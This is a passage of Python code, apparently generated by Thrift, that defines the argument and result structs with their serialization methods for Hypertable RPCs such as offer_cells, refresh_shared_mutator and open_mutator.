    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.STRING:
          self.success = iprot.readString()
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.e = ClientException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)  # unknown field id: skip for forward compatibility
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the output protocol *oprot*; None fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_cells_serialized_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.STRING, 0)
      oprot.writeString(self.success)
      oprot.writeFieldEnd()
    if self.e is not None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # items() instead of Python-2-only iteritems() so repr works on Python 3 too.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class refresh_shared_mutator_args:
  """
  Thrift call-argument struct for refresh_shared_mutator().

  Attributes:
   - ns: namespace handle (i64)
   - table_name: table whose shared mutator is refreshed
   - mutate_spec: MutateSpec identifying the shared mutator
  """
  thrift_spec = (
    None, # 0
    (1, TType.I64, 'ns', None, None, ), # 1
    (2, TType.STRING, 'table_name', None, None, ), # 2
    (3, TType.STRUCT, 'mutate_spec', (MutateSpec, MutateSpec.thrift_spec), None, ), # 3
  )
  def __init__(self, ns=None, table_name=None, mutate_spec=None,):
    self.ns = ns
    self.table_name = table_name
    self.mutate_spec = mutate_spec
  def read(self, iprot):
    """Populate this struct's fields from the input protocol *iprot*."""
    # Fast path: C-accelerated decoder when the protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.ns = iprot.readI64()
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.table_name = iprot.readString()
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.STRUCT:
          self.mutate_spec = MutateSpec()
          self.mutate_spec.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)  # unknown field id: skip for forward compatibility
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the output protocol *oprot*; None fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('refresh_shared_mutator_args')
    if self.ns is not None:
      oprot.writeFieldBegin('ns', TType.I64, 1)
      oprot.writeI64(self.ns)
      oprot.writeFieldEnd()
    if self.table_name is not None:
      oprot.writeFieldBegin('table_name', TType.STRING, 2)
      oprot.writeString(self.table_name)
      oprot.writeFieldEnd()
    if self.mutate_spec is not None:
      oprot.writeFieldBegin('mutate_spec', TType.STRUCT, 3)
      self.mutate_spec.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # items() instead of Python-2-only iteritems() so repr works on Python 3 too.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class refresh_shared_mutator_result:
  """
  Thrift result struct for refresh_shared_mutator() (a void method);
  carries only the optional ClientException raised by the call.

  Attributes:
   - e: ClientException raised by the server, if any
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
  )
  def __init__(self, e=None,):
    self.e = e
  def read(self, iprot):
    """Populate this struct's fields from the input protocol *iprot*."""
    # Fast path: C-accelerated decoder when the protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.e = ClientException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)  # unknown field id: skip for forward compatibility
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the output protocol *oprot*; None fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('refresh_shared_mutator_result')
    if self.e is not None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # items() instead of Python-2-only iteritems() so repr works on Python 3 too.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class offer_cells_args:
  """
  Thrift call-argument struct for offer_cells().

  Attributes:
   - ns: namespace handle (i64)
   - table_name: table to write to
   - mutate_spec: MutateSpec identifying the shared mutator
   - cells: list of Cell structs to offer
  """
  thrift_spec = (
    None, # 0
    (1, TType.I64, 'ns', None, None, ), # 1
    (2, TType.STRING, 'table_name', None, None, ), # 2
    (3, TType.STRUCT, 'mutate_spec', (MutateSpec, MutateSpec.thrift_spec), None, ), # 3
    (4, TType.LIST, 'cells', (TType.STRUCT,(Cell, Cell.thrift_spec)), None, ), # 4
  )
  def __init__(self, ns=None, table_name=None, mutate_spec=None, cells=None,):
    self.ns = ns
    self.table_name = table_name
    self.mutate_spec = mutate_spec
    self.cells = cells
  def read(self, iprot):
    """Populate this struct's fields from the input protocol *iprot*."""
    # Fast path: C-accelerated decoder when the protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.ns = iprot.readI64()
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.table_name = iprot.readString()
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.STRUCT:
          self.mutate_spec = MutateSpec()
          self.mutate_spec.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 4:
        if ftype == TType.LIST:
          self.cells = []
          # range() instead of Python-2-only xrange() — equivalent for this loop.
          (_etype, _size) = iprot.readListBegin()
          for _ in range(_size):
            _cell = Cell()
            _cell.read(iprot)
            self.cells.append(_cell)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)  # unknown field id: skip for forward compatibility
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the output protocol *oprot*; None fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('offer_cells_args')
    if self.ns is not None:
      oprot.writeFieldBegin('ns', TType.I64, 1)
      oprot.writeI64(self.ns)
      oprot.writeFieldEnd()
    if self.table_name is not None:
      oprot.writeFieldBegin('table_name', TType.STRING, 2)
      oprot.writeString(self.table_name)
      oprot.writeFieldEnd()
    if self.mutate_spec is not None:
      oprot.writeFieldBegin('mutate_spec', TType.STRUCT, 3)
      self.mutate_spec.write(oprot)
      oprot.writeFieldEnd()
    if self.cells is not None:
      oprot.writeFieldBegin('cells', TType.LIST, 4)
      oprot.writeListBegin(TType.STRUCT, len(self.cells))
      for _cell in self.cells:
        _cell.write(oprot)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # items() instead of Python-2-only iteritems() so repr works on Python 3 too.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class offer_cells_result:
  """
  Thrift result struct for offer_cells() (a void method);
  carries only the optional ClientException raised by the call.

  Attributes:
   - e: ClientException raised by the server, if any
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
  )
  def __init__(self, e=None,):
    self.e = e
  def read(self, iprot):
    """Populate this struct's fields from the input protocol *iprot*."""
    # Fast path: C-accelerated decoder when the protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.e = ClientException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)  # unknown field id: skip for forward compatibility
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the output protocol *oprot*; None fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('offer_cells_result')
    if self.e is not None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # items() instead of Python-2-only iteritems() so repr works on Python 3 too.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class offer_cells_as_arrays_args:
  """
  Thrift call-argument struct for offer_cells_as_arrays().

  Attributes:
   - ns: namespace handle (i64)
   - table_name: table to write to
   - mutate_spec: MutateSpec identifying the shared mutator
   - cells: list of cells, each a list of strings
  """
  thrift_spec = (
    None, # 0
    (1, TType.I64, 'ns', None, None, ), # 1
    (2, TType.STRING, 'table_name', None, None, ), # 2
    (3, TType.STRUCT, 'mutate_spec', (MutateSpec, MutateSpec.thrift_spec), None, ), # 3
    (4, TType.LIST, 'cells', (TType.LIST,(TType.STRING,None)), None, ), # 4
  )
  def __init__(self, ns=None, table_name=None, mutate_spec=None, cells=None,):
    self.ns = ns
    self.table_name = table_name
    self.mutate_spec = mutate_spec
    self.cells = cells
  def read(self, iprot):
    """Populate this struct's fields from the input protocol *iprot*."""
    # Fast path: C-accelerated decoder when the protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.ns = iprot.readI64()
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.table_name = iprot.readString()
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.STRUCT:
          self.mutate_spec = MutateSpec()
          self.mutate_spec.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 4:
        if ftype == TType.LIST:
          self.cells = []
          # range() instead of Python-2-only xrange() — equivalent for these loops.
          (_etype, _size) = iprot.readListBegin()
          for _ in range(_size):
            _row = []
            (_inner_etype, _inner_size) = iprot.readListBegin()
            for _ in range(_inner_size):
              _row.append(iprot.readString())
            iprot.readListEnd()
            self.cells.append(_row)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)  # unknown field id: skip for forward compatibility
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the output protocol *oprot*; None fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('offer_cells_as_arrays_args')
    if self.ns is not None:
      oprot.writeFieldBegin('ns', TType.I64, 1)
      oprot.writeI64(self.ns)
      oprot.writeFieldEnd()
    if self.table_name is not None:
      oprot.writeFieldBegin('table_name', TType.STRING, 2)
      oprot.writeString(self.table_name)
      oprot.writeFieldEnd()
    if self.mutate_spec is not None:
      oprot.writeFieldBegin('mutate_spec', TType.STRUCT, 3)
      self.mutate_spec.write(oprot)
      oprot.writeFieldEnd()
    if self.cells is not None:
      oprot.writeFieldBegin('cells', TType.LIST, 4)
      oprot.writeListBegin(TType.LIST, len(self.cells))
      for _row in self.cells:
        oprot.writeListBegin(TType.STRING, len(_row))
        for _item in _row:
          oprot.writeString(_item)
        oprot.writeListEnd()
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # items() instead of Python-2-only iteritems() so repr works on Python 3 too.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class offer_cells_as_arrays_result:
  """
  Thrift result struct for offer_cells_as_arrays() (a void method);
  carries only the optional ClientException raised by the call.

  Attributes:
   - e: ClientException raised by the server, if any
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
  )
  def __init__(self, e=None,):
    self.e = e
  def read(self, iprot):
    """Populate this struct's fields from the input protocol *iprot*."""
    # Fast path: C-accelerated decoder when the protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.e = ClientException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)  # unknown field id: skip for forward compatibility
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the output protocol *oprot*; None fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('offer_cells_as_arrays_result')
    if self.e is not None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # items() instead of Python-2-only iteritems() so repr works on Python 3 too.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class offer_cell_args:
  """
  Thrift-generated argument struct for the offer_cell RPC.

  Attributes:
   - ns (i64): handle, presumably a namespace id — confirm against Hypertable API
   - table_name (string)
   - mutate_spec (MutateSpec)
   - cell (Cell)
  """
  thrift_spec = (
    None, # 0
    (1, TType.I64, 'ns', None, None, ), # 1
    (2, TType.STRING, 'table_name', None, None, ), # 2
    (3, TType.STRUCT, 'mutate_spec', (MutateSpec, MutateSpec.thrift_spec), None, ), # 3
    (4, TType.STRUCT, 'cell', (Cell, Cell.thrift_spec), None, ), # 4
  )
  def __init__(self, ns=None, table_name=None, mutate_spec=None, cell=None,):
    self.ns = ns
    self.table_name = table_name
    self.mutate_spec = mutate_spec
    self.cell = cell
  def read(self, iprot):
    """Deserialize this struct from the input protocol *iprot*."""
    # Fast path: C-accelerated binary decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.ns = iprot.readI64();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.table_name = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.STRUCT:
          self.mutate_spec = MutateSpec()
          self.mutate_spec.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 4:
        if ftype == TType.STRUCT:
          self.cell = Cell()
          self.cell.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        # Unknown field id: skip for forward compatibility.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the output protocol *oprot*."""
    # Fast path: C-accelerated binary encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('offer_cell_args')
    if self.ns != None:
      oprot.writeFieldBegin('ns', TType.I64, 1)
      oprot.writeI64(self.ns)
      oprot.writeFieldEnd()
    if self.table_name != None:
      oprot.writeFieldBegin('table_name', TType.STRING, 2)
      oprot.writeString(self.table_name)
      oprot.writeFieldEnd()
    if self.mutate_spec != None:
      oprot.writeFieldBegin('mutate_spec', TType.STRUCT, 3)
      self.mutate_spec.write(oprot)
      oprot.writeFieldEnd()
    if self.cell != None:
      oprot.writeFieldBegin('cell', TType.STRUCT, 4)
      self.cell.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # Generated structs perform no field validation.
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class offer_cell_result:
  """
  Thrift-generated result struct for the offer_cell RPC.

  Attributes:
   - e: ClientException raised by the server, or None on success
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
  )
  def __init__(self, e=None,):
    self.e = e
  def read(self, iprot):
    """Deserialize this struct from the input protocol *iprot*."""
    # Fast path: C-accelerated binary decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.e = ClientException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        # Unknown field id: skip for forward compatibility.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the output protocol *oprot*."""
    # Fast path: C-accelerated binary encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('offer_cell_result')
    if self.e != None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # Generated structs perform no field validation.
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class offer_cell_as_array_args:
  """
  Thrift-generated argument struct for the offer_cell_as_array RPC.

  Attributes:
   - ns (i64): handle, presumably a namespace id — confirm against Hypertable API
   - table_name (string)
   - mutate_spec (MutateSpec)
   - cell (list<string>): cell encoded as a string array
  """
  thrift_spec = (
    None, # 0
    (1, TType.I64, 'ns', None, None, ), # 1
    (2, TType.STRING, 'table_name', None, None, ), # 2
    (3, TType.STRUCT, 'mutate_spec', (MutateSpec, MutateSpec.thrift_spec), None, ), # 3
    (4, TType.LIST, 'cell', (TType.STRING,None), None, ), # 4
  )
  def __init__(self, ns=None, table_name=None, mutate_spec=None, cell=None,):
    self.ns = ns
    self.table_name = table_name
    self.mutate_spec = mutate_spec
    self.cell = cell
  def read(self, iprot):
    """Deserialize this struct from the input protocol *iprot*."""
    # Fast path: C-accelerated binary decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.ns = iprot.readI64();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.table_name = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.STRUCT:
          self.mutate_spec = MutateSpec()
          self.mutate_spec.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 4:
        if ftype == TType.LIST:
          # Element-by-element decode of the list<string> field.
          self.cell = []
          (_etype154, _size151) = iprot.readListBegin()
          for _i155 in xrange(_size151):
            _elem156 = iprot.readString();
            self.cell.append(_elem156)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      else:
        # Unknown field id: skip for forward compatibility.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the output protocol *oprot*."""
    # Fast path: C-accelerated binary encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('offer_cell_as_array_args')
    if self.ns != None:
      oprot.writeFieldBegin('ns', TType.I64, 1)
      oprot.writeI64(self.ns)
      oprot.writeFieldEnd()
    if self.table_name != None:
      oprot.writeFieldBegin('table_name', TType.STRING, 2)
      oprot.writeString(self.table_name)
      oprot.writeFieldEnd()
    if self.mutate_spec != None:
      oprot.writeFieldBegin('mutate_spec', TType.STRUCT, 3)
      self.mutate_spec.write(oprot)
      oprot.writeFieldEnd()
    if self.cell != None:
      oprot.writeFieldBegin('cell', TType.LIST, 4)
      oprot.writeListBegin(TType.STRING, len(self.cell))
      for iter157 in self.cell:
        oprot.writeString(iter157)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # Generated structs perform no field validation.
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class offer_cell_as_array_result:
  """
  Thrift-generated result struct for the offer_cell_as_array RPC.

  Attributes:
   - e: ClientException raised by the server, or None on success
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
  )
  def __init__(self, e=None,):
    self.e = e
  def read(self, iprot):
    """Deserialize this struct from the input protocol *iprot*."""
    # Fast path: C-accelerated binary decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.e = ClientException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        # Unknown field id: skip for forward compatibility.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the output protocol *oprot*."""
    # Fast path: C-accelerated binary encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('offer_cell_as_array_result')
    if self.e != None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # Generated structs perform no field validation.
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class open_mutator_args:
  """
  Thrift-generated argument struct for the open_mutator RPC.

  Attributes:
   - ns (i64): handle, presumably a namespace id — confirm against Hypertable API
   - table_name (string)
   - flags (i32): default 0
   - flush_interval (i32): default 0
  """
  thrift_spec = (
    None, # 0
    (1, TType.I64, 'ns', None, None, ), # 1
    (2, TType.STRING, 'table_name', None, None, ), # 2
    (3, TType.I32, 'flags', None, 0, ), # 3
    (4, TType.I32, 'flush_interval', None, 0, ), # 4
  )
  # Defaults are pulled from the thrift_spec tuples (index 4 is the default).
  def __init__(self, ns=None, table_name=None, flags=thrift_spec[3][4], flush_interval=thrift_spec[4][4],):
    self.ns = ns
    self.table_name = table_name
    self.flags = flags
    self.flush_interval = flush_interval
  def read(self, iprot):
    """Deserialize this struct from the input protocol *iprot*."""
    # Fast path: C-accelerated binary decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.ns = iprot.readI64();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.table_name = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.I32:
          self.flags = iprot.readI32();
        else:
          iprot.skip(ftype)
      elif fid == 4:
        if ftype == TType.I32:
          self.flush_interval = iprot.readI32();
        else:
          iprot.skip(ftype)
      else:
        # Unknown field id: skip for forward compatibility.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the output protocol *oprot*."""
    # Fast path: C-accelerated binary encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
